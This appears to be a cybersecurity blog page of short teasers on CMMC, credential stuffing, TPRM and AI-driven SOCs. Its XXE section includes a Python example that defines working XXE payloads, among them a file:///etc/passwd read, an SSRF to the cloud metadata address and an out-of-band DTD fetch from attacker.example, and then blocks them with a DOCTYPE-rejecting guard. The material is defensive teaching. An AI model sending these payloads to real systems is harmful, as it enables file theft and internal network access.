The Cybersecurity Maturity Model Certification (CMMC) 2.0 is the U.S. Department of Defense's (DoD) updated cybersecurity compliance framework for defense contractors and an evolution of CMMC 1.0.
Let’s catch up on the more interesting vulnerability disclosures and cyber security news gathered from articles across the web this week. This is what we have been reading about on our coffee break! Another shop falls to the hackers, but this time it is just the usual credential stuffing: reused passwords from earlier breaches replayed against the shop's login. People, sort your passwords out.
It’s no secret that the software development life cycle is becoming more complex. With a plethora of libraries, frameworks, and now AI coding agents and assistants, we can build far more ambitious software in a fraction of the time. This is fantastic! But with it come greater opportunities for accidental or malicious security bugs and vulnerabilities to sneak in undetected, with potentially devastating consequences for your users and their trust in your company.
A decade ago, the primary focus of TPRM was questionnaire management and distribution, usually done in a simple and manual way, relying on vendors to self-report on their security practices. Today the basic best practices of TPRM have grown to include continuous monitoring and other advanced AI-based capabilities like CVE alerting for third parties as elementary aspects of an effective program.
• The brutal truth about cybersecurity work: analysts spend their days chasing alerts that are 99% false positives instead of doing meaningful security work. Grant Oviatt reveals why security professionals didn't get into the field to send Slack messages asking if someone is "supposed to be traveling to Mexico today." This is why AI agents are becoming essential: to let security pros focus on what they actually signed up for!
“With AI, everything changes daily. You can’t secure what constantly evolves.” Ante Gojsalić on why AI security needs continuous testing, not outdated pentests.
XML external entity injection (XXE) is a web security vulnerability in how an application parses XML. An attacker who controls the XML input can declare external entities in the document's DTD and have the server-side parser resolve them. Depending on the parser and its configuration, that lets the attacker read files on the server, make the server issue requests to internal systems the application can reach (server-side request forgery), or exfiltrate data out of band through an attacker-hosted DTD. In a minority of setups it escalates further, for example to remote code execution (RCE) where PHP's expect:// stream wrapper is enabled, but file read and SSRF are the usual outcomes, and the standard fix is the same for all of them: disable DTD processing and external entity resolution for untrusted input.
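The following is an added example, not code from the original article: it shows what the three common XXE payload shapes look like (in-band file read, SSRF, and out-of-band via a parameter entity) and a pre-parse guard that rejects any untrusted document carrying a DTD before it reaches the parser. The payloads, the order document, the 169.254.169.254 metadata address and the attacker.example host are all constructed for illustration; only the Python standard library is used.

```python
"""XXE: what the payloads look like, and a guard that refuses them.

Added example (not from the original page). Standard library only; every
input below is constructed inline for the demonstration.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample inputs (not captured from any real application).
BENIGN_ORDER = """<?xml version="1.0"?>
<order><id>1042</id><sku>WIDGET-7</sku><qty>3</qty></order>"""

# In-band XXE: the entity body is read from the server's filesystem and
# reflected wherever the application echoes <id> back to the client.
XXE_FILE_READ = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><id>&xxe;</id><sku>WIDGET-7</sku><qty>3</qty></order>"""

# SSRF flavour: the parser fetches an internal URL on the attacker's behalf.
# The cloud metadata address is used here purely as an illustration.
XXE_SSRF = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<order><id>&xxe;</id></order>"""

# Out-of-band (blind) flavour: a parameter entity pulls an attacker-hosted
# DTD, so nothing has to be reflected in the HTTP response to leak data.
XXE_OOB = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">
  %ext;
]>
<order><id>1</id></order>"""


class XXEBlocked(ValueError):
    """Raised when a document carries a DTD, which untrusted input never needs."""


_DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
_ENTITY = re.compile(
    rb"<!ENTITY\s+(%\s*)?([\w.-]+)\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def find_external_entities(xml_bytes: bytes) -> list:
    """Names of external (SYSTEM/PUBLIC) entities declared in the document's DTD.

    Usable on its own for logging or WAF-style detection; [] for clean input.
    """
    return [m.group(2).decode() for m in _ENTITY.finditer(xml_bytes)]


def parse_untrusted_xml(xml_bytes: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing any document with a DTD.

    Rejecting the DOCTYPE up front blocks external entities (file read, SSRF,
    out-of-band exfiltration) and internal entity-expansion bombs alike, and
    does not depend on which features a given parser enables by default.
    """
    if _DOCTYPE.search(xml_bytes):
        names = find_external_entities(xml_bytes)
        raise XXEBlocked(
            f"DTD not allowed in untrusted XML (external entities: {names})"
        )
    # xml.etree does not resolve external entities itself, but the guard
    # above is the control relied on here, not parser defaults.
    return ET.fromstring(xml_bytes)


def order_summary(xml_bytes: bytes) -> dict:
    """Example consumer: the child elements the application would act on."""
    root = parse_untrusted_xml(xml_bytes)
    return {child.tag: (child.text or "") for child in root}


def rejects(xml_bytes: bytes) -> bool:
    """True if the guard refuses the document (handy as a regression check)."""
    try:
        parse_untrusted_xml(xml_bytes)
    except XXEBlocked:
        return True
    return False


if __name__ == "__main__":
    print(order_summary(BENIGN_ORDER.encode()))
    for name, payload in [("file read", XXE_FILE_READ),
                          ("ssrf", XXE_SSRF), ("oob", XXE_OOB)]:
        try:
            order_summary(payload.encode())
        except XXEBlocked as exc:
            print(f"{name}: blocked -> {exc}")
```

The guard is deliberately parser-independent: whether the application uses xml.etree, lxml, or a Java DocumentBuilder, refusing the DOCTYPE before parsing removes the attacker's ability to declare entities at all. Where the stack offers a native switch, use it as well (for example Java's `http://apache.org/xml/features/disallow-doctype-decl` feature set to true), so the protection does not rest on a regex alone.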
AI-powered SOC platforms are revolutionizing cybersecurity by dramatically reducing false positives and enabling analysts to focus on high-value security work. In this episode of Data Security Decoded, join Caleb Tolin as he sits down with Grant Oviatt, Head of Security Operations at Prophet Security, to explore how AI agents are transforming security operations centers (SOCs) and reshaping the future of cyber defense.